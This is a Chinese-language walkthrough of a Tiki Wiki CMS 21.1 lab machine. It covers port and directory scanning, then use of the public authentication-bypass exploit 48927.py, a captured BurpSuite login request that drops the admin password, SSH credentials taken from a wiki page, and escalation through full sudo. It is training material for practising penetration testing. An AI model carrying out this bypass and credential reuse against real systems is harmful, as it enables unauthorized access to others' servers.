Scan

先arp-scan -l扫描附件主机ip

nmap -sS -sV -n -T4 -p- 192.168.93.132

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 20:25 CST

Nmap scan report for 192.168.93.132

Host is up (0.0013s latency).

Not shown: 65531 closed tcp ports (reset)

PORT    STATE SERVICE     VERSION

22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))

139/tcp open  netbios-ssn Samba smbd 4.6.2

445/tcp open  netbios-ssn Samba smbd 4.6.2

MAC Address: 00:0C:29:3D:07:BF (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

dirsearch扫描靶机ip

[20:44:47] 403 -  279B  - /.ht_wsr.txt

[20:44:47] 403 -  279B  - /.htaccess.bak1

[20:44:47] 403 -  279B  - /.htaccess.orig

[20:44:47] 403 -  279B  - /.htaccess.sample

[20:44:47] 403 -  279B  - /.htaccess_extra

[20:44:47] 403 -  279B  - /.htaccess_sc

[20:44:47] 403 -  279B  - /.htaccessBAK

[20:44:47] 403 -  279B  - /.htaccessOLD

[20:44:47] 403 -  279B  - /.htaccessOLD2

[20:44:47] 403 -  279B  - /.htaccess.save

[20:44:47] 403 -  279B  - /.htaccess_orig

[20:44:47] 403 -  279B  - /.html

[20:44:47] 403 -  279B  - /.htpasswd_test

[20:44:47] 403 -  279B  - /.htpasswds

[20:44:47] 403 -  279B  - /.htm

[20:44:47] 403 -  279B  - /.httr-oauth

[20:44:48] 403 -  279B  - /.php

[20:45:43] 200 -   42B  - /robots.txt

[20:45:45] 403 -  279B  - /server-status

[20:45:45] 403 -  279B  - /server-status/

[20:45:53] 301 -  315B  - /tiki  ->  http://192.168.93.132/tiki/

[20:45:53] 200 -  526B  - /tiki/doc/stable.version

访问192.168.93.132/tiki发现是tiki wiki cms初始页面,有登录入口

访问tiki/doc/stable.version,结果是一堆版本,也不知道靶机用的到底是哪个版本的cms

继续扫描192.168.93.132/tiki/ ,发现tiki/changelog.txt,进去发现有版本号21.1

用kali自带工具searchsploit搜索相关漏洞。

发现一个Tiki Wiki CMS Groupware 21.1 - Authentication Bypass,正好这个cms是21.1的

查看利用脚本内容searchsploit -m php/webapps/48927.py

运行脚本python 4* <host>

结果

python3 4* 192.168.93.132

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

提示用bp抓包去掉密码登录

POST /tiki/tiki-login.php HTTP/1.1

Host: 192.168.93.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 121

Origin: http://192.168.93.132

Connection: close

Referer: http://192.168.93.132/tiki/tiki-login.php

Cookie: PHPSESSID=iecm9rpfmkduvu74nmgd48k2tk; PHPSESSIDCV=04zHn53nqCLMqnyrzYRe7Q%3D%3D; javascript_enabled=y; local_tz=Asia%2FShanghai

Upgrade-Insecure-Requests: 1

ticket=izkMYy9ZWrHFDwo7M5oVc2l7rTR7Ys9kjI4dyjy9984&user=admin&pass=w&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

在List Page页面的Credentials页面发现silky:Agy8Y7SPJNXQzqA

疑似ssh登录密码,尝试登录

这个竟然能直接提权了

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:

    (ALL : ALL) ALL

这意味着 silky 用户在 ubuntu 系统上具有完整的 sudo 权限,具体解读为:

(ALL : ALL) ALL:

第一个 ALL:silky 用户可以以 任何用户身份 运行命令。

第二个 ALL:silky 用户可以在 系统上的任何组 下运行命令。

第三个 ALL:silky 用户可以执行 所有命令。```

vulhub靶机的flag一般在/root目录或/root目录子目录下

Tiki靶机练习的更多相关文章

  1. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  2. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  3. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

  4. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  5. Fowsniff: 1靶机入侵

    一.信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...

  6. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  7. Moonraker:1靶机入侵

      0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...

  8. FourAndSix: 2.01靶机入侵

      0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...

  9. Typhoon-v1.02 靶机入侵

      0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS ...

  10. Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...

随机推荐

  1. IM开发快速入门(一):什么是IM系统?

    本文在编写时参考了博客作者"鹿呦呦"和在线课程"即时消息技术剖析与实战"的相关资料,一并表示感谢. 1.系列文章引言 IM系统看似简单(没错,很多土老板认为开发 ...

  2. 百度高效研发实战训练营-Step2

    百度高效研发实战训练营Step2 2.1 代码的艺术 2.1.1<代码的艺术>目的解读 这门课程的目的主要有以下四点: (1) 了解公司与学校写代码的不同 (2) 消除对于程序员这个职业的 ...

  3. 解决线程安全问题的方式三:Lock锁 --- JDK5.0新增

    Lock( 锁) 从JDK 5.0开始,Java提供了更强大的线程同步机制--通过显式定义同步锁对象来实现同步.同步锁使用Lock对象充当. java.util.concurrent.locks. ...

  4. 使用 Dify + LLM 构建精确任务处理应用

    在构建基于大语言模型(LLM)的应用时,如何确保返回结果的准确性和可重复性是一个常见的挑战.本文将结合 Dify + LLM 的使用经验,介绍如何设计一个精确的 LLM 任务处理流程,避免传统 LLM ...

  5. Nodify学习 二:添加节点

    Nodify学习 一:介绍与使用 - 可乐_加冰 - 博客园 (cnblogs.com) Nodify学习 二:添加节点 - 可乐_加冰 - 博客园 (cnblogs.com) 添加节点(nodes) ...

  6. TCP 和 UDP 可以使用同一个端口吗?

    文档地址:https://mp.weixin.qq.com/s/3fMZN_LidCi5fiD16nNWWA

  7. [BZOJ3786] 星系探索 题解

    题目链接:\(BZOJ\) 本题通过 \(dyf\_DYF\) 的题解理解 \(ETT\),代码则借鉴 \(lcyfrog\) 的题解,图片则使用了何太狼的题解.在此笔者感谢这三位神犇. 声明变量: ...

  8. MOS管的寄生电容

    我们经常看到,在电源电路中,功率MOS管的G极经常会串联一个小电阻,几欧姆到几十欧姆不等,那么这个电阻用什么作用呢? 这个电阻的作用有2个作用:限制G极电流,抑制振荡. 限制G极电流MOS管是由电压驱 ...

  9. macbookpro m3本地部署DeepSeek模型

    macbookpro m3有着十分强大的性能.在deepseek如火如荼的当下,可以尝试在本地部署并使用.还可以将自己的文档作为语料喂给deepseek,使其能成为自己专属的AI助手. 本文介绍使用o ...

  10. MySQL - [09] 正则表达式

    转载:https://mp.weixin.qq.com/s/7RavuYGs9SthX2pxGJppqw select * from t1 where name rlike '^[a-zA-Z]+$' ...